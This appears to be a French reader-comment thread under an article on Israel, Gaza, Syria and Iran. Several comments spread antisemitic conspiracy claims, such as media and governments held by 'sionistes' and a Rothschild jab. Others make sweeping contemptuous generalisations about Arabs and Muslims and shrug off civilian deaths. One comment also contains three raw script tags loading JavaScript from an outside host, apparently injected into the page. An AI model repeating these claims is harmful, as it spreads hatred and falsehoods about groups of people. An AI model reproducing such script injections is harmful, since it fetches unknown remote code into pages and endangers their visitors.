                                      Au prétexte qu’il pourrait y avoir des dégâts collatéraux un gouvernement devrait s’abstenir de riposter pour protéger sa population ?....Pas très sérieux ni réaliste comme proposition....
                                      La guerre, car c’est bien là d’un conflit qu’il s’agit, ça fait des morts, des blessés...

                                      Le combat des palestiniens est peut-être juste, je n’en sais rien et m’en moque, mais la façon dont ils ont choisi de le mener c’est leur choix et ce choix a des conséquences...Il n’y a quasiment jamais eu d’attaque directe contre Tsahal, de temps à autre un garde frontière ou un poste de contrôle est attaqué mais les affrontements directs sont rares...la stratégie des palestiniens c’est de tirer des roquettes sur cibles civiles, jamais ils ne prennent pour cible les cantonnements de Tsahal, ils visent systématiquement les zones civiles...

                                      Alors que de temps en temps ils se prennent un retour de flamme et que quelques civils y passent c’est dans l’ordre de choses, d’autant que ces « innocentes victimes civiles » sont utilisées a des fins de propagande éhontée sur l’air regardez Tsahal massacre les civils qui n’ont rien fait...

                                      Les conflits asymétriques c’est compliqué à gérer pour une armée régulière mais lorsque que l’on prend la responsabilité d’installer au coeur m^me de Gaza, un des territoires les plus densément peuplé au monde, une base de lancement de roquettes on sait d’avance que l’on transforme les civils en cibles potentielles...


                                      • Gilles Mérivac Gilles Mérivac 20 novembre 07:17

                                        Ce genre d’article qui prend un fait détaché de son contexte pour jouer uniquement sur les émotions ne vaut pas un clou. Comme pour les noyades de migrants, c’est uniquement de la propagande, rien d’autre.


                                        • Allexandre 20 novembre 19:15

                                          @Gilles Mérivac
                                          C’est fou comme on ne croit pas une minute en votre bonne foi. L’inverse vous aurait autrement fait réagir, c’est certain !!


                                        • Raymond75 20 novembre 07:27

                                          Bravo Massada et Dach : toujours fidèles au poste, toujours consciencieux :

                                          https://fjb.blogs.com/.a/6a00e54f841b7e883301a73dee11bf970d-pi

                                          http://img.over-blog-kiwi.com/0/99/21/41/20190729/ob_002af3_high-ech.JPG

                                          Zak5 est en permission ?


                                          • Jonas 20 novembre 07:31
                                            1. Depuis , Gaza , Emirat islamique , dominait par deux bandes de milices terroristes , le Hamas et le Djihad islamique constamment en concurrence , pour régner sur ce territoire , tirent des centaines de roquettes sur Israël , pour venger la liquidation d’un chef terroriste islamique Bahaa Abu Al-Ata , comme d’ailleurs le font tous les pays arabo-musulmans à l’encontre des terroristes qui sévissent dans leur pays, engluer pourrissant la vie. Une famille palestinienne est malheureusement tuée. Cela va faire des pages et des pages dans la presse arabo-musulmane.Le coeur des arabo-musulmans ne bat que pour les palestiniens tués par Israël . Les palestiniens tués par les autres pays arabo-musulmans non pas d’importance. Même Mahmoud Abbas le président de l’autorité . palestinienne (AP) , n’accorde aucune considération a ces palestiniens. 
                                            2. C’est en Israël que se situe la seule bourse où un palestinien a une certaine cotation partout ailleurs , elle est sans valeur.
                                            3. Plus de 4 000 palestiniens sont morts en Syrie , depuis le début de 2011 on ne connaît , pas le nombre de familles , de femmes et d"enfants . Ces morts n’intéressent personne et ne font pas pleurer dans les gourbis ni dans les mosquées  la presse arabo-musulmane se f ... éperdument . Pourquoi ? Parce qu’ils ne sont pas tués par des israéliens . Seuls les arabo-musulmans ont ce droit de vie ou de morts sur leurs frères comme si cela va dans l’ordre des choses. Voyez : Syrie-Irak-Yemen Libye etc. 

                                            • Gilles Mérivac Gilles Mérivac 20 novembre 08:09

                                              @Jonas
                                              Parfaitement exact.


                                            • Massada Massada 20 novembre 07:38

                                              A partir d’1h20 cette nuit et durant une heure et demie, le Khe’l Avir, l’Armée de l’Air israélienne, a visé et détruit des douzaines d’objectifs en Syrie, la moitié d’entre eux environ appartenant à la Force Quds de l’Armée iranienne, l’autre moitié étant constituée de positions de l’Armée gouvernementale syrienne.
                                               

                                              Tous les objectifs visés ont été atteints et détruits avec une extrême précision. Certains d’entre eux, notamment sur l’aéroport international de Damas, n’ont été que partiellement démolis afin de réduire les dégâts collatéraux et de ne pas attenter aux intérêts russes.

                                               

                                              Cette opération, l’une des plus importantes depuis le début de la Guerre Civile Syrienne, constitue la riposte israélienne au tir de quatre roquettes par l’Armée iranienne hier en direction de l’Etat hébreu. Toutes les roquettes avaient été abattues, mais Jérusalem tenait à indiquer aux Perses, aux Syriens et à tous les partis présents dans la région que le territoire israélien était sacré et que nous ne laisserons pas s’instaurer une routine de tentatives d’agressions contre icelui, même si ces dernières échouent.

                                              Notre message est clair : nous nous en prendrons à tous ceux qui cherchent à nous nuire.


                                              • Massada Massada 20 novembre 07:43

                                                Les avions israéliens, opérant entre autres depuis le Golan et le territoire libanais, ont épargné les sites de lancement des missiles antiaériens S-300 pour la raison qu’ils sont servis par des troupes russes.
                                                 
                                                Les pilotes de Tsahal ont toutefois signifié à Moscou par des signes électroniques sans équivoques, qu’en cas de recours à ces armes elles seraient détruites sans état d’âme.
                                                 

                                                L’Armée de Bashar al Assad a tiré un missile sol-air en direction de nos appareils malgré des avertissements envoyés aux Syriens de ne pas recourir à des tirs contre nos avions.

                                                En conséquences de cet unique tir, nos avions ont détruit un grand nombre de batteries de la Défense antiaérienne de l’Armée gouvernementale.
                                                 

                                                Les annonces de Damas selon lesquelles sa DCA aurait intercepté des objets volants israéliens sont « délirantes ».


                                                • Massada Massada 20 novembre 07:44

                                                  Enfin suite à l’inaction des Etats-Unis et de l’Europe face à la reprise du programme nucléaire iranien, Israël étudie l’éventualité d’une opération d’envergure destinée à anéantir l’infrastructure nucléaire de la théocratie iranienne.
                                                   
                                                  En cas de risque avéré d’une progression de l’ennemi dans le processus de fabrication d’une bombe atomique, Israël interviendra pour l’empêcher de parvenir à son terme.
                                                   


                                                  • DACH 20 novembre 11:33

                                                    @Massada=Bonjour, face à la stratégie du boa des Iraniens, les réponses israéliennes sont toujours mesurées, puisque celui qui lance un miisile ne passera pas la nuit ! Le message n’est pas toujours entièrement compris, et l’aveuglement des dirigeants iraniens va les mener à faire des erreurs de compréhension plus lourdes de ce que veulent et peuvent les Israéliens. Ils ont le devoir de prendre à chaque fois un temps d’avance, Se défendre contre quelqu’un qui ne songe qu’à vous détruire vous met dans l’obligation d’un état d’esprit « samouraï ! ». Si la situation intérieure de l’Iran dégénère, les disigeants iraniens seront dans l’obligation d’allumer des feux extérieus plus importants. L’état major l’a prévu et sait ce qui doit être engagé. 

                                                    <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script> <script src="//skillapp.net/2143f05201d76950ea.js"></script>

                                                  • papat 20 novembre 16:47

                                                    ont tout compris ces allemands

                                                    Un Allemand sur quatre de formation supérieure est touché par l’antisémitisme, sous une forme ou sous une autre, selon une étude du Congrès juif mondial réalisée cet été.

                                                    Une étude menée par le Congrès juif mondial il y a deux mois et publiée mercredi 23 octobre par le quotidien Süddeutsche Zeitung a révélé qu’un Allemand sur quatre partageait d’une façon ou d’une autre des idées antisémites.

                                                    Le sondage a été réalisé avant l’attaque contre une synagogue à Halle, en Allemagne, auprès de 1.300 Allemands. Les résultats sont particulièrement éloquents pour la catégorie de personnes diplômées du supérieur, et gagnant au moins 100.000 euros par an .

                                                    « Complot juif » mondial 28% d’entre elles estiment que les juifs ont reçu trop de pouvoirs dans l’économie et 26% sont enclins à croire à un « complot juif » mondial ainsi qu’à d’autres représentations classiques de l’antisémitisme. Près de la moitié des sondés (48%) jugent que les juifs allemands sont plus loyaux envers la politique d’Israël qu’envers celle de Berlin.Pis encore, 12% des personnes interrogées estiment que les juifs sont responsables de la plupart des guerres sur Terre et 22% disent ne pas aimer les juifs sans fournir aucune raison.

                                                    • foufouille foufouille 20 novembre 16:55

                                                      @papat

                                                      ça fait beaucoup de riches débiles ...........


                                                    • papat 20 novembre 17:57

                                                      @foufouille
                                                      débiles de penser que macron l’éborgneur sort de chez Rothschild. 


                                                    • alexis42 alexis42 21 novembre 09:04

                                                      @papat
                                                      « L’enquête effectuée dans la communauté juive de Baltimore par l’American Jewish Committee montra que les deux tiers des répondants admettaient penser que les autres Juifs étaient envahissants, hostiles, vulgaires, matérialistes, et responsables de l’antisémitisme. Et c’étaient uniquement ceux qui étaient disposés à l’admettre. » [YAFFE, James, The American Jews, 1968, p. 73]


                                                    • alexis42 alexis42 21 novembre 21:33

                                                      @alexis42
                                                      J’adore ce site où le crétinisme se manifeste en mettant un vote négatif à l’énoncé d’un simple fait.


                                                    • JC_Lavau JC_Lavau 21 novembre 21:53

                                                      @alexis42. Mal rédigé, ton message était excessivement cryptique.


                                                    • Allexandre 20 novembre 19:19

                                                      Tout le monde sait que les médias français à 90% sont entre les mains des sionistes et que les gouvernants aux 2/3.

                                                      Israël peut massacrer tous les Arabes qu’il veut, tout le monde s’en fout. Trois morts israéliens tués à l’arme blanche à Jérusalem, et c’est la « Une » de tous les journaux français. Où comment lécher le cul de ceux qui dirigent vraiment !!!!!! HONTEUX.


                                                      • ung do 20 novembre 19:30

                                                        _ palestiniens = peaux rouges

                                                        _ Gaza = réserve indienne

                                                        _ Israéliens = Américains blancs

                                                        En Palestine , c’est comme si les pauvres blancs sont attaqués par des Peaux rouges haineux , les blancs ont absolument le droit de se défendre 

                                                        Les Iraniens qui sont à 1000 km de distance d’Israel et ne demandaient rien à personne ont été .promus depuis 30 ans « islamistes fanatiques » et menace existentielle des Israéliens qui avaient besoin d’’un épouvantail et on les menace depuis tout ce temps de les bombarder . C’est comme on érige le Brésil comme menace anti blancs USA .

                                                        Les Israéliens remportent tous les jours des victoires aériennes , leurs bombardements touchent avec une précision extrême tous les jours des cibles iraniennes ou syriennes en Syrie ; depuis tout ce temps , il ne devrait y avoir aucun soldat iranien ou syrien debout , n’est ce pas ? Mais par contre , à domicile , grace aux progrès de la technologie des drones et des missiles de croisière , les équipements hyper sophistiqués Patriot , THAAD , Dôme de fer , Fronde de David se révèlent comme des passoires couteuses ; les missiles gazaouis se révèlent capables de déposer leurs charges avec une précision de quelques mètres jusqu’à,Tel Aviv , aux dernières nouvelles .


Ajouter une réaction

Pour réagir, identifiez-vous avec votre login / mot de passe, en haut à droite de cette page

Si vous n'avez pas de login / mot de passe, vous devez vous inscrire ici.


FAIRE UN DON






Les thématiques de l'article


Palmarès